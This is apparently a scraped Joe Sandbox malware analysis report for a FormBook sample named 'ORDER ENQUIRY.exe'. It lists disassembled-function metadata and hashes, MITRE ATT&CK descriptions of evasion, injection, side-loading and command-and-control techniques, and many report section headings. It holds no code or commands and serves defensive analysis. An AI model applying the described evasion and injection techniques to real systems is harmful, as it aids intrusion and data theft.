Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: a5a4a8fda9f0b134e2237fae4b6fafb77c2fee5b9554a585bcb3edb531337783
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: E791B571E022199BDF38DE69C881ABEB7A1EF44724F544F1AEC65E72C0E770B9408761

Function 04899126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 04899191
@, xrefs: 04899175

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: a3a786a2251fed97d1ffe7088c5ab908aa67a33ad9bdb730a3527e140e73a3ed
Instruction ID: 69d1286fbe19a790899e242c37317925cde484ab82b101cb94c31bac229ba41f
Opcode Fuzzy Hash: a3a786a2251fed97d1ffe7088c5ab908aa67a33ad9bdb730a3527e140e73a3ed
Instruction Fuzzy Hash: 94813EB1D002699BDB35CB54CC44BEEB7B8AB08714F0446EAEA09F7640D775AE84CF61

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDER ENQUIRY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER ENQUIRY.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
ORDER ENQUIRY.exe

Function 015ED4A8 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Function 015ED4B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 07733B8D Relevance: 1.8, APIs: 1, Instructions: 253
processCOMMON

Function 07733B98 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 015EAE28 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 015E590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 015E449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 07733909 Relevance: 1.6, APIs: 1, Instructions: 77
injectionCOMMON

Function 07733910 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 07733770 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Function 077339F8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON